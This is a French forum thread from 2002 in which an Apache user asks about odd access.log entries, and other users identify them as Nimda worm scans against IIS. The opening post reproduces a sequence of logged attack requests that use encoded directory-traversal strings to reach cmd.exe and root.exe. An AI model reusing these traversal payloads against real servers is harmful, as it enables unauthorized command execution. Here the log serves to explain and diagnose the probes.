apache: c koi c chose dans mon access.log
apache: c koi c chose dans mon access.log - Divers - Programmation
Marsh Posté le 26-12-2002 à 11:23:02
des failles de secu de IIS. Bien sur t'as pas IIS mais les petits malins qui attaqent ton IP ne s'en préoccupe pas 
---------------
Just because you feel good does not make you right
Marsh Posté le 26-12-2002 à 11:25:25
| DarkLord a écrit : des failles de secu de IIS. Bien sur t'as pas IIS mais les petits malins qui attaqent ton IP ne s'en préoccupe pas |
Mais non c'est Nimda : Les utilisateurs de IIS ne s'en rendent meme pas compte qu'ils font chier le monde avec car les attaques Nimda ne font que propager ces commandes : C'est de l'insouciance a mon avis
Marsh Posté le 26-12-2002 à 11:36:58
| samuelp a écrit : |
je sais que c'est Nimda. Mais en attendant c'est un truc spécifique à IIS 
---------------
Just because you feel good does not make you right
Marsh Posté le 26-12-2002 à 12:28:38
| DarkLord a écrit : des failles de secu de IIS. Bien sur t'as pas IIS mais les petits malins qui attaqent ton IP ne s'en préoccupe pas |
c pas plutot Nimda qui fait chier son monde 
edit: grilled again, et par samuelp en plus ![[:totoz]](https://forum-images.hardware.fr/images/perso/totoz.gif "[:totoz]")
Message édité par Harkonnen le 26-12-2002 à 12:29:36
---------------
J'ai un string dans l'array (Paris Hilton)
Marsh Posté le 26-12-2002 à 12:33:12
---------------
Just because you feel good does not make you right
Marsh Posté le 26-12-2002 à 12:35:06
Reply![[:tapai]](https://forum-images.hardware.fr/images/perso/tapai.gif "[:tapai]")
Marsh Posté le 28-12-2002 à 15:40:09
Pas sûr qu'ils aient eu, il suffit juste qu'ils essaient tout un range d'ip "juste pour voir". J'ai eu ces choses là aussi dans mon access.log. Mais qui n'en a jamais eu?
---------------
Whichever format the fan may want to listen is fine with us – vinyl, wax cylinders, shellac, 8-track, iPod, cloud storage, cranial implants – just as long as it’s loud and rockin' (Billy Gibbons, ZZ Top)
Marsh Posté le 28-12-2002 à 15:53:25
n'empeche que c'est hyper frequent genre plusieurs fois par jour voir par heure
Marsh Posté le 28-12-2002 à 16:05:44
| fils_de_la_lumiere a écrit : n'empeche que c'est hyper frequent genre plusieurs fois par jour voir par heure |
C'est plus calme maintenant. Au plus fort de l'infection, j'en avais une rafale toutes les 5 minutes.
Marsh Posté le 28-12-2002 à 21:14:20
ouais j'en ai tjs 1 à 3 par jour 
---------------
#19b | Mardi 18 Février 2003 - nous fêtons les Bernadette | contre le fleur icq!
Marsh Posté le 28-12-2002 à 22:49:21
Reply
Marsh Posté le 28-12-2002 à 22:57:48
| HappyHarry a écrit : |
qd je dis 1à3, je parle pas de hits mais d'ip differents hein
---------------
#19b | Mardi 18 Février 2003 - nous fêtons les Bernadette | contre le fleur icq!
Marsh Posté le 28-12-2002 à 23:16:49
| --greg-- a écrit : qd je dis 1à3, je parle pas de hits mais d'ip differents hein |
tu fais bien de préciser, on avait tous mal compris ![[:greg2]](https://forum-images.hardware.fr/images/perso/greg2.gif "[:greg2]")
---------------
Whichever format the fan may want to listen is fine with us – vinyl, wax cylinders, shellac, 8-track, iPod, cloud storage, cranial implants – just as long as it’s loud and rockin' (Billy Gibbons, ZZ Top)
Marsh Posté le 28-12-2002 à 23:19:13
Reply
Marsh Posté le 29-12-2002 à 01:03:15
| HappyHarry a écrit : |
---------------
#19b | Mardi 18 Février 2003 - nous fêtons les Bernadette | contre le fleur icq!
Marsh Posté le 29-12-2002 à 02:47:51
Ya pas un petit script qui capable d'envoyer un net send IP "vous avez le virus nimda sur votre system"
a chaque tentative de "hack"?
Marsh Posté le 29-12-2002 à 11:19:54
| +yann a écrit : Ya pas un petit script qui capable d'envoyer un net send IP "vous avez le virus nimda sur votre system" |
ca serait cool tiens ![[:ddr555]](https://forum-images.hardware.fr/images/perso/ddr555.gif "[:ddr555]")
Marsh Posté le 29-12-2002 à 11:20:07
Reply
Marsh Posté le 29-12-2002 à 11:30:36
Reply
Marsh Posté le 29-12-2002 à 14:36:29
le gars avait balancé un log de je sais pas combien de lignes juste pour dire que lui aussi en avait, c t super intéressant 
Marsh Posté le 29-12-2002 à 14:38:50
Reply
Marsh Posté le 29-12-2002 à 15:37:03
| +yann a écrit : Ya pas un petit script qui capable d'envoyer un net send IP "vous avez le virus nimda sur votre system" |
y'en avait un, ca doit se retrouver.
Marsh Posté le 01-01-2003 à 17:13:37
| HappyHarry a écrit : |
---------------
Nothing can stop me, I'm never satisfied, I take what i want, refuse to be denied...
Sujets relatifs:
- ACCESS 2000 et OUTLOOK 2000
- Pb Access
- [VBA Access] vous connaitriez pas un site bien pour apprendre
- [Access] Venez m'aider !
- [ACCESS] Problème de requette
- Poukoi "./" marche pas dans Access pour le rep courant ??
- [SGBD ACCESS] Executer plusieurs requettes SQL en un seul coup
- Requête action sous Access 2002
- Ouvrir une page de cadre avec autre chose que les pages par défaut ..
- [php] Microsoft Outlook Web Access - Connexion ???
Marsh Posté le 26-12-2002 à 01:22:27
depuis que j'ai installé apache j'ai continuelement (mon access.log fait 3mo alors que j'y accede que tres rarement) remplis de ce genre de ligne a des moments ou je c que personne que je connait utilise mon serveur
81.48.216.247 - - [26/Dec/2002:01:03:50 +0100] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 783
81.48.216.247 - - [26/Dec/2002:01:03:51 +0100] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 783
81.48.216.247 - - [26/Dec/2002:01:03:53 +0100] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 783
81.48.216.247 - - [26/Dec/2002:01:03:55 +0100] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 783
81.48.216.247 - - [26/Dec/2002:01:03:57 +0100] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 783
81.48.216.247 - - [26/Dec/2002:01:04:01 +0100] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 783
81.48.216.247 - - [26/Dec/2002:01:04:03 +0100] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 783
81.48.216.247 - - [26/Dec/2002:01:04:04 +0100] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 783
81.48.216.247 - - [26/Dec/2002:01:04:06 +0100] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 783
81.48.216.247 - - [26/Dec/2002:01:04:07 +0100] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 783
81.48.216.247 - - [26/Dec/2002:01:04:09 +0100] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 783
81.48.216.247 - - [26/Dec/2002:01:04:10 +0100] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 783
81.48.216.247 - - [26/Dec/2002:01:04:12 +0100] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 789
81.48.216.247 - - [26/Dec/2002:01:04:13 +0100] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 789
81.48.216.247 - - [26/Dec/2002:01:04:15 +0100] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 783
81.48.216.247 - - [26/Dec/2002:01:04:20 +0100] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 783
que signifient c lignes??
merci